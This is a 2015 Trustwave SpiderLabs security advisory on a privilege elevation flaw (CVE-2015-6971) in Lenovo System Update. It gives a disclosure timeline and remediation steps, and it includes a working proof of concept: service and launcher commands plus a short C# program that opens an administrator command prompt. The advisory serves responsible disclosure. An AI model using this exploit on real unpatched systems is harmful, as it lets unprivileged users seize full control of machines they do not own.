Trustwave SpiderLabs Security Advisory TWSL2015-018: Service Privilege Elevation in Lenovo System Update 5 Published: 10/15/2015 Version: 1.0 Vendor: Lenovo (www.lenovo.com) Product: Lenovo System Update Version affected: Versions prior to 5.07.0013 Product description: System Update Software by Lenovo Finding 1: Privilege Elevation Vulnerability Credit: Martin Rakhmanov of Trustwave CVE: CVE-2015-6971 Lenovo System Update prior to 5.07.0013 allows unprivileged local users to elevate privileges to LocalSystem by submitting commands to the System Update Service. The service accepts and executes commands coming from certain signed Lenovo executables only. However these executables can be launched and executed by unprivileged local users making it possible to inject arbitrary code into them and bypass security checks that way. One scenario would be to launch Lenovo Update and Drivers, then using a small helper application attach to it and inject a DLL. The DLL will send commands to the System Update Service named pipe for subsequent execution as LocalSytem. Proof of concept: An unprivileged user can run: "C:\Program Files (x86)\Lenovo\System Update\ConfigService.exe" start echo test > C:\Users\Public\S.log "C:\Program Files (x86)\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments "A1 A2 C:\Users\Public\S.log "" """ /directory "C:\Program Files (x86)\Lenovo\System Update" /type COMMAND At this point System Update GUI should be visible. Now compile the following small program (copy UNCObject.dll from C:\Program Files (x86)\Lenovo\System Update\) and run it as the same unprivileged user: // csc.exe /r:UNCObject.dll /platform:x86 LSUS_SEPT2015.cs using System; using UNCRemoting; public class LSUS_SEPT2015 { public static void Main(String[] args) { Connector connector = (Connector) Activator.GetObject(typeof(Connector), "tcp://localhost:20050/Connector"); connector.DoEvent(UNCAction.LaunchIE, "cmd.exe"); } } Command Prompt window running as Administrator is there now: system is fully controlled by an unprivileged user. Please note that IOActive reported a similar issue originally (CVE-2015-2219) but it was never properly patched and the issue is still exploitable via the method described above. Remediation Steps: Apply the 5.07.0013 update or the latest stable version of the Lenovo System Update software. Please note that Trustwave SpiderLabs have not verified this fix. Revision History: 05/11/2015 - Vulnerability disclosed to vendor 09/17/2015 - Sent follow-up to vendor about incomplete fixes 10/14/2015 - Vendor releases fix in version 5.07.0013 10/15/2015 - Advisory published References 1. https://support.lenovo.com/us/en/product_security/lsu_privilege About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.